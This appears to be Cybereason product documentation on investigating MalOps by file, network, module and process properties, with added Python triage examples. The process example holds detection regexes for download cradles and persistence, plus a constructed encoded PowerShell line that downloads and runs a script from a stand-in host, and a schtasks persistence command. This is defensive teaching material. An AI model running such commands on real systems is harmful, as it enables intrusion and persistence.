Analyze MalOps and Determine Threat Level

When the Cybereason platform creates a MalOp, the MalOp represents a highly likely instance of malicious behavior. As a result, you want to fully analyze the processes, files, connections, machines, users, and other Elements associated with the MalOp to fully understand what is occurring in your environment.

This topic presents guidelines for investigating the details included with MalOps so you can better respond to the behaviors that present the biggest threat to your organization.

Investigate MalOp properties

To determine if a MalOp presents a threat to your organization, consider the properties listed in this section.

You can view information about a MalOp’s properties from:

  • The Malop details screen: Access the Malop details screen for a MalOp by clicking the MalOp on the Malops management screen.

  • The Investigation screen’s Element details pane: Search for the Elements associated with the MalOp, or open the Investigation screen directly from the MalOp’s Malop details screen. Click an item in the Investigation screen’s results grid to view the Element details pane.

Each MalOp type requires a different approach to investigation. See the Investigation column in the tables in the Malop Types and Components topic to learn which of the following properties to focus on based on MalOp type.

Files

Start by looking at the general properties associated with the files included in the MalOp:

File Name and Attributes

Look at file name and attributes. For .exe files, the Cybereason platform reports a number of important details:

  • Process names and IDs running from a file

  • Process creation and end times

  • Command line used by the process started from this file

  • Details about the image file (for processes)

  • Extension type of the file

  • Path to the file

  • Signature details

  • Product names and types, and the company names for the file

Suspicious data for any of these indicators shows a possibly malicious file worth investigating further.

Suspicions and evidence

Did the Cybereason platform associate any evidence or suspicions with this file?

Signature

Is the file signed, and by whom? Anomalies in the signature (an unsigned binary, an invalid signature, or a publisher that does not match the vendor the file claims) are often a sign of potentially malicious behavior.

File location

Is the file in a suspicious folder, such as a Temp, AppData, or ProgramData folder? A file that runs from a user-writable location such as these is a suspicious indicator.

Reputation

What is the file’s reputation? A bad or unknown reputation warrants a closer look.

The file details in the following image from the Element Details screen point to malicious activity because the file is unsigned and running from the temp folder.

[Image: File Malop Triage]
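The file checks above, as an added Python example (not Cybereason code and not from this page): it scores a file record against the indicators in the table, using the path, signature, claimed company, reputation and extension. The folder list, the document-extension list and the system-binary list are assumptions chosen for the example, and the sample records are constructed, not real telemetry.

```python
"""Score a file's static properties against the file-triage indicators."""
from dataclasses import dataclass

# Folders the page calls out as suspicious execution locations, plus tmp for
# macOS and Linux sensors (assumption: added for this example).
SUSPICIOUS_DIRS = {"temp", "tmp", "appdata", "programdata"}
# Document extensions often used in double-extension masquerading
# (assumption: illustrative list, not from the page).
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
# Executables that legitimately live only under the Windows directory
# (assumption: illustrative list).
SYSTEM_BINARIES = {"svchost.exe", "lsass.exe", "csrss.exe", "winlogon.exe", "services.exe"}


@dataclass
class FileRecord:
    path: str
    signed: bool
    signer: str = ""             # publisher from the code signature
    company: str = ""            # company name from the file's version resource
    reputation: str = "unknown"  # "good", "bad" or "unknown"


def split_path(path):
    """Return (directory components, file name), lower-cased; accepts \\ or /."""
    parts = [p for p in path.replace("\\", "/").lower().split("/") if p]
    return parts[:-1], parts[-1]


def company_matches_signer(company, signer):
    """True when the claimed company plausibly matches the signer.

    Only the first word is compared ("Microsoft Corporation" vs
    "Microsoft Windows"); the goal is to catch files claiming a vendor
    they are not signed by, not to establish trust.
    """
    return company.split()[0].lower() in signer.lower()


def triage_file(f):
    """Return the list of suspicious indicators found on the file."""
    indicators = []
    dirs, name = split_path(f.path)

    if SUSPICIOUS_DIRS & set(dirs):
        indicators.append("runs from a temp or user-writable folder")

    if not f.signed:
        indicators.append("unsigned")
    elif f.company and not company_matches_signer(f.company, f.signer):
        indicators.append("signer does not match the company the file claims")

    if f.reputation != "good":
        indicators.append(f"reputation is {f.reputation}")

    # invoice.pdf.exe: an executable dressed up as a document
    stem, _, ext = name.rpartition(".")
    if ext == "exe" and "." in stem and stem.rpartition(".")[2] in DOC_EXTS:
        indicators.append("double extension masquerading as a document")

    if name in SYSTEM_BINARIES and "windows" not in dirs:
        indicators.append("system binary name running outside the Windows directory")

    return indicators


# Constructed sample records (not real telemetry).
SAMPLE_FILES = {
    "unsigned_temp": FileRecord(
        path=r"C:\Users\alice\AppData\Local\Temp\invoice.pdf.exe",
        signed=False, reputation="unknown"),
    "fake_microsoft": FileRecord(
        path=r"C:\ProgramData\svchost.exe", signed=True,
        signer="Contoso Ltd", company="Microsoft Corporation", reputation="unknown"),
    "clean": FileRecord(
        path=r"C:\Windows\System32\svchost.exe", signed=True,
        signer="Microsoft Windows", company="Microsoft Corporation", reputation="good"),
}

if __name__ == "__main__":
    for label, rec in SAMPLE_FILES.items():
        print(f"{label}: {triage_file(rec)}")
```

The signer check is deliberately loose; what it catches is the case in the process example later on this page, a file that claims to be from Microsoft but is signed by someone else.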

Network

Every MalOp includes relevant network information in the Communication tab of the MalOp. Investigate these properties to see potentially malicious behavior on the network.

When analyzing the network properties, ask yourself questions such as:

Network connections

Ask questions about the communication and connections, including:

  • Are there network connections? Internal or external connections?

  • How long are the connections?

  • Is there data transmitted through these connections? How much?

  • Which ports are used in these connections?

  • What direction is the communication?

If you find unexpected answers to these questions, you need to investigate further into such connections.

Listening connections

Is there a listening connection or port on a process?

DNS requests

Investigate both resolved and unresolved DNS requests, and determine whether each request is expected. Repeated requests for names that never resolve deserve a closer look.

Processes

What processes are performing the connections? Should they be?

For example, the details in the following image suggest suspicious activity because a machine is connecting to port 4444, which is the default listener port for Metasploit’s Meterpreter. In addition, the two machines are transferring data.

[Image: Network Malop Triage]
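The connection questions above, as an added Python example (not Cybereason code and not from this page): it flags one connection record for the attacker-tool port the page mentions, external traffic from a process that should not need it, large outbound transfers, long-lived sessions, unexpected listeners and unresolved DNS requests. The process lists and the size and duration thresholds are assumptions for the example; the sample connections are constructed.

```python
"""Flag suspicious properties of a process's network connections."""
import ipaddress
from dataclasses import dataclass

# Port the page names as the Metasploit default handler port; other tool
# ports can be added in the same form.
ATTACK_TOOL_PORTS = {4444: "Metasploit default handler port"}
# Processes that normally have no reason to reach the internet
# (assumption: illustrative list).
NO_EXTERNAL_EXPECTED = {"notepad.exe", "calc.exe", "mspaint.exe", "rundll32.exe"}
# Processes expected to hold listening sockets (assumption: illustrative list).
EXPECTED_LISTENERS = {"svchost.exe", "system", "sshd", "nginx", "httpd"}
# Thresholds chosen for the example; tune per environment.
LARGE_TRANSFER_BYTES = 10 * 1024 * 1024   # 10 MiB outbound
LONG_CONNECTION_SECONDS = 60 * 60          # one hour


@dataclass
class Connection:
    process: str
    remote_ip: str = ""
    port: int = 0                 # remote port, or the local port of a listening socket
    direction: str = "outbound"   # "outbound", "inbound" or "listening"
    bytes_sent: int = 0
    bytes_received: int = 0
    duration_s: int = 0
    dns_name: str = ""            # name the process tried to resolve, if any
    dns_resolved: bool = True


def is_external(ip):
    """True for routable addresses; private, loopback and link-local are internal."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local)


def triage_connection(c):
    """Return the suspicious indicators for one connection record."""
    indicators = []
    proc = c.process.lower()

    if c.direction == "listening":
        if proc not in EXPECTED_LISTENERS:
            indicators.append(f"unexpected listener on port {c.port}")
        return indicators

    if c.port in ATTACK_TOOL_PORTS:
        indicators.append(f"port {c.port}: {ATTACK_TOOL_PORTS[c.port]}")

    external = bool(c.remote_ip) and is_external(c.remote_ip)
    if external and proc in NO_EXTERNAL_EXPECTED:
        indicators.append("external connection from a process that should not need one")

    if c.direction == "outbound" and external and c.bytes_sent >= LARGE_TRANSFER_BYTES:
        indicators.append(f"large outbound transfer ({c.bytes_sent} bytes)")

    if c.duration_s >= LONG_CONNECTION_SECONDS:
        indicators.append(f"long-lived connection ({c.duration_s} s)")

    if c.dns_name and not c.dns_resolved:
        indicators.append(f"unresolved DNS request for {c.dns_name}")

    return indicators


# Constructed sample connections (not real telemetry); 8.8.8.8 stands in for
# any public address.
SAMPLE_CONNECTIONS = [
    Connection("notepad.exe", "8.8.8.8", 4444, "outbound",
               bytes_sent=12 * 1024 * 1024, duration_s=7200),
    Connection("chrome.exe", "8.8.8.8", 443, "outbound",
               bytes_sent=20_000, bytes_received=500_000, duration_s=30),
    Connection("cmd.exe", port=8080, direction="listening"),
    Connection("rundll32.exe", dns_name="qxz8f1.example", dns_resolved=False),
]

if __name__ == "__main__":
    for conn in SAMPLE_CONNECTIONS:
        print(conn.process, triage_connection(conn))
```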

Module

For each MalOp, investigate the modules included with the processes running as part of the MalOp. The MalOp details report the loaded modules associated with the malicious process. However, to view details about the modules, you must use the Investigation screen, either through the MalOp details or independently.

When analyzing modules, ask yourself questions such as:

Module properties

What are the properties of the module or modules? Your Cybereason platform reports a number of details, including:

  • Names and addresses

  • Header and allocated properties values

  • Whether the header is a malformed executable header

  • Characteristics of the module

  • General file details

Scan these properties for suspicious indicators.

Floating modules

Is the module floating, that is, loaded in memory without a backing file on disk? If so, compare the header and allocated protection values and check for mismatches.

Processes

What processes are using these modules? Should they be using them?

Intelligence

Is this a known module when you search for it on the internet?

In general, the more common the module, the less likely it is to be malicious.
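The module checks above, as an added Python example (not Cybereason code and not from this page): it validates the DOS and PE signatures of a module's image header with `struct`, flags floating modules whose header and allocated protections disagree, flags writable-and-executable regions, and treats a module seen on very few machines as rare. Reading the page's "header and allocated properties" as memory protections, the 1% rarity threshold, and the sample modules are assumptions for the example; the headers are built in code rather than taken from real files.

```python
"""Check loaded-module properties: header sanity, floating modules with
protection mismatches, and how common the module is across the fleet."""
import struct
from dataclasses import dataclass

IMAGE_DOS_SIGNATURE = 0x5A4D      # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550   # "PE\0\0"


def check_pe_header(data):
    """Return problems found in a PE image header, empty if it looks sane.

    Only the DOS header and NT signature are checked; that is enough to
    catch headers that were wiped or overwritten to hinder analysis.
    """
    if len(data) < 64:
        return ["image shorter than a DOS header"]
    problems = []
    e_magic, = struct.unpack_from("<H", data, 0)
    if e_magic != IMAGE_DOS_SIGNATURE:
        problems.append("missing MZ signature")
    e_lfanew, = struct.unpack_from("<I", data, 60)
    if e_lfanew + 4 > len(data):
        problems.append("e_lfanew points outside the image")
        return problems
    nt_sig, = struct.unpack_from("<I", data, e_lfanew)
    if nt_sig != IMAGE_NT_SIGNATURE:
        problems.append("missing PE signature at e_lfanew")
    return problems


def build_pe_header(mz=True, pe=True, e_lfanew=64):
    """Build a minimal (constructed) x64 PE header for the samples below."""
    dos = bytearray(64)
    if mz:
        dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 60, e_lfanew)
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 0, 0)
    return bytes(dos) + (b"PE\0\0" if pe else b"\0\0\0\0") + coff


@dataclass
class Module:
    name: str
    base_address: int
    floating: bool                 # no backing file on disk
    header_protection: str         # protection declared by the image, e.g. "RX"
    allocated_protection: str      # protection of the mapped region, e.g. "RWX"
    image_header: bytes = b""
    seen_on_machines: int = 1      # machines in the environment that load it


def triage_module(m, fleet_size):
    """Return the suspicious indicators for one module record."""
    indicators = []
    if m.floating:
        indicators.append("floating module (not backed by a file on disk)")
        if m.header_protection != m.allocated_protection:
            indicators.append(
                f"protection mismatch: header {m.header_protection}, "
                f"allocated {m.allocated_protection}")
    if "W" in m.allocated_protection and "X" in m.allocated_protection:
        indicators.append("writable and executable memory")
    indicators += check_pe_header(m.image_header)
    # Assumption: a module on at most 1% of machines counts as rare.
    if m.seen_on_machines <= max(1, fleet_size // 100):
        indicators.append(f"rare: seen on {m.seen_on_machines} of {fleet_size} machines")
    return indicators


# Constructed sample modules (not real telemetry).
SAMPLE_MODULES = {
    "ntdll": Module("ntdll.dll", 0x7FF800000000, False, "RX", "RX",
                    build_pe_header(), seen_on_machines=500),
    "injected": Module("(unnamed)", 0x1A0000, True, "RX", "RWX",
                       build_pe_header(mz=False), seen_on_machines=1),
}

if __name__ == "__main__":
    for label, mod in SAMPLE_MODULES.items():
        print(label, triage_module(mod, fleet_size=500))
```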

Process

For each MalOp, the Cybereason platform collects a variety of information about the processes involved in the associated activities. The Malop Inbox reports the process details in the Processes tab of the MalOp details.

When analyzing the process properties, ask questions such as:

Process details

Scan the collected process details including:

  • The file associated with the process

  • The total time for the process

  • Start and end times for the process

Suspicions and evidence

What suspicions and evidence are associated with the process?

Process type

What type of process is it: an OS process or a third-party process?

It is also a good idea to look at the product type for the process.

Command line

What is the command line returned for the process? Many malicious behaviors originate from command line arguments so be sure to check these closely.

Process behaviors

Does the process create other ways to persist itself, such as registry entries, scheduled tasks, services, or child processes? Does this process have a suspicious parent process? Is it an injected process?

In addition, for all processes, you can view the Attack Tree to see how the process fits with other processes in your environments. For details on the Attack Tree, see Hunt with the Attack Tree.

The process details in the following image point to suspicious activity because, while the process claims to be from Microsoft, it is not signed by Microsoft. Additionally, the process is running from a temp folder and has an unknown reputation.

[Image: Process Malop Triage]
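The process checks above, as an added Python example (not Cybereason code and not from this page): it scans the command line for encoded PowerShell, hidden windows, download cradles and persistence commands, decodes a `-EncodedCommand` payload (base64 of UTF-16LE) so the real command can be scanned too, flags a shell spawned by a document application, flags persistence set up by child processes, and carries the injected flag through. The pattern list and the application and shell lists are assumptions for the example; the sample process records, including the encoded payload, are constructed in the block itself.

```python
"""Triage a process record: command line, parent, persistence and injection."""
import base64
import re
from dataclasses import dataclass, field

# Document applications that should not spawn shells (assumption: illustrative).
DOCUMENT_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "acrord32.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# (regex, meaning) pairs scanned against command lines. Assumption: illustrative set.
CMDLINE_PATTERNS = [
    (re.compile(r"-(e|ec|enc|encodedcommand)\s", re.I), "encoded PowerShell command"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|iwr|certutil.*-urlcache", re.I),
     "download cradle"),
    (re.compile(r"reg(\.exe)?\s+add\s+.*\\currentversion\\run", re.I), "Run key persistence"),
    (re.compile(r"schtasks(\.exe)?\s+/create", re.I), "scheduled task persistence"),
    (re.compile(r"sc(\.exe)?\s+create", re.I), "service persistence"),
]


def decode_encoded_powershell(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


@dataclass
class ProcessRecord:
    name: str
    command_line: str
    parent_name: str = ""
    injected: bool = False
    children: list = field(default_factory=list)   # command lines of child processes


def triage_process(p):
    """Return the suspicious indicators for one process record."""
    indicators = []
    for pattern, meaning in CMDLINE_PATTERNS:
        if pattern.search(p.command_line):
            indicators.append(meaning)
    decoded = decode_encoded_powershell(p.command_line)
    if decoded:
        # Rescan the decoded payload: the cradle usually hides inside it.
        for pattern, meaning in CMDLINE_PATTERNS:
            if pattern.search(decoded) and meaning not in indicators:
                indicators.append(meaning)
    if p.parent_name.lower() in DOCUMENT_APPS and p.name.lower() in SHELLS:
        indicators.append(f"{p.name} spawned by {p.parent_name}")
    for child in p.children:
        for pattern, meaning in CMDLINE_PATTERNS:
            if "persistence" in meaning and pattern.search(child):
                indicators.append(f"child process sets up {meaning}")
    if p.injected:
        indicators.append("injected process")
    return indicators


# Constructed sample: the payload is encoded here exactly as PowerShell expects it.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_PROCESSES = {
    "macro_child": ProcessRecord(
        name="powershell.exe",
        command_line=f"powershell.exe -NoP -W Hidden -Enc {ENCODED}",
        parent_name="winword.exe",
        children=[r"schtasks.exe /create /tn Updater /tr C:\Users\Public\u.exe /sc onlogon"]),
    "injected": ProcessRecord("notepad.exe", "notepad.exe", parent_name="explorer.exe",
                              injected=True),
    "benign": ProcessRecord("svchost.exe", "svchost.exe -k netsvcs", parent_name="services.exe"),
}

if __name__ == "__main__":
    for label, proc in SAMPLE_PROCESSES.items():
        print(label, triage_process(proc))
```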

Analyze the Auto response status

For Endpoint Protection MalOps generated by Cybereason’s EPP features, look at the Malops management screen’s Auto response column. The Auto response column provides information on how Cybereason’s NGAV feature has responded to the incident, and helps you decide how to respond to it. The following table includes status descriptions, which types of malware are associated with each status, and suggested actions to take.

Disinfected

  • Description: Malware was detected and the malicious file was disinfected. If the file could not be disinfected, it is removed from the machine. Note: in this case the file is not quarantined; it is completely removed from the machine.

  • Malware types: Known

  • Suggested action: No additional action is required.

Failed to disinfect

  • Description: Malware was detected and prevented, but Anti-Malware could not disinfect or remove the file.

  • Malware types: Known

  • Suggested action: Access the machine and remove the malware.

Detected

  • Description: Malware was detected but no action was taken to prevent it.

  • Malware types: Unknown, Fileless

  • Suggested action: Investigate the malware to determine if it is indeed malicious. If it is, access the machine and remove the malware.

Prevented

  • Description: Malware was detected and prevented.

  • Malware types: Known, Unknown, Fileless

  • Suggested action: No additional action is required.

Done

  • Description: A user (analyst) has marked the malware as done.

  • Malware types: All types

  • Suggested action: No additional action is required.

Excluded

  • Description: A user (analyst) has excluded the malware. Anti-Malware ignores the malware on all endpoints.

  • Malware types: All types

  • Suggested action: No additional action is required.

Deleting on restart

  • Description: Malware was detected and prevented. It will be removed upon restart.

  • Malware types: Known

  • Suggested action: No immediate action is required. Follow this MalOp to ensure the status becomes ‘Disinfected’ after restart, indicating that the malware was indeed removed.

Quarantined

  • Description: Malware was detected and the malicious file was quarantined. The Cybereason platform has moved the malicious file to a different location to prevent it from executing. Quarantined files are placed in the following folders:

      • Windows: C:\ProgramData\apv2\Quarantine

      • Mac: /usr/local/cybereason

      • Linux: /opt/cybereason/sensor/Quarantine

    Cybereason deletes quarantined files after 30 days. The cleanup runs daily (every 24 hours) and on sensor startup.

    Note: The Quarantined status is relevant only for malware triggered by Artificial Intelligence analysis and behavioral document protection.

  • Malware types: Unknown

  • Suggested action: No additional action is required.

Determine the threat level

After you investigate your MalOp, you need to consider all the answers together to determine if the behavior is malicious and requires further remediation.

When deciding how, or in what order, to address MalOps you have deemed a threat to your organization, consider:

  • The significance of the machines involved in the suspicious activities. Address the machines that are most vital to your organization first.

  • The significance of the behavior. Address severe activities before other, less severe activities.

  • The significance of the users involved. A compromise of some users is more serious than of others. For example, suspicious activity on a CEO’s computer or on a machine with sensitive material is important to address immediately.

If you found several suspicious behaviors, it is likely you are dealing with an attack. If only one property is suspicious, the behavior may be benign.
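The prioritization rule above, as an added Python example (not Cybereason code and not from this page): it turns the number of suspicious properties into a verdict, orders MalOps judged to be threats by the three factors in the order the page lists them (machine, behavior, user), and maps the verdict to the next step. The ordinal scales for machine role, severity and user role, and the sample MalOp summaries, are assumptions for the example.

```python
"""Rank MalOps into a working order from their investigation results."""
from dataclasses import dataclass

# Ordinal scales used only for sorting (assumption: map these from your own
# asset inventory and MalOp severity labels).
MACHINE_CRITICALITY = {"workstation": 1, "server": 2, "domain controller": 3}
BEHAVIOR_SEVERITY = {"low": 1, "medium": 2, "high": 3}
USER_SENSITIVITY = {"standard": 1, "privileged": 2, "executive": 3}


@dataclass
class MalopSummary:
    malop_id: str
    suspicious_indicators: int   # properties that came back suspicious during triage
    machine_role: str
    severity: str
    user_role: str


def assess(m):
    """Several suspicious properties together point to an attack; one alone
    may be benign and needs more context before remediation."""
    if m.suspicious_indicators >= 2:
        return "likely attack"
    return "possibly benign" if m.suspicious_indicators == 1 else "no indicators"


def recommended_action(m):
    return {
        "likely attack": "escalate and remediate",
        "possibly benign": "investigate further before excluding",
        "no indicators": "exclude as benign",
    }[assess(m)]


def priority_key(m):
    # Larger tuples sort first: threats before non-threats, then machine,
    # behavior and user significance in the page's order, then indicator count.
    return (
        m.suspicious_indicators >= 2,
        MACHINE_CRITICALITY.get(m.machine_role, 0),
        BEHAVIOR_SEVERITY.get(m.severity, 0),
        USER_SENSITIVITY.get(m.user_role, 0),
        m.suspicious_indicators,
    )


def rank_malops(malops):
    """Return the MalOps in the order they should be worked (stable sort)."""
    return sorted(malops, key=priority_key, reverse=True)


# Constructed sample summaries (not real MalOps).
SAMPLE_MALOPS = [
    MalopSummary("M-1", 3, "workstation", "high", "standard"),
    MalopSummary("M-2", 1, "domain controller", "high", "privileged"),
    MalopSummary("M-3", 2, "server", "medium", "standard"),
    MalopSummary("M-4", 4, "workstation", "high", "executive"),
]

if __name__ == "__main__":
    for m in rank_malops(SAMPLE_MALOPS):
        print(m.malop_id, assess(m), "->", recommended_action(m))
```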

Based on your responses to these answers, you may need to escalate MalOps, remediate potential threats, or exclude benign behaviors. See Manage the MalOp Workflow, Remediate MalOps, and Manage False Positives for more information.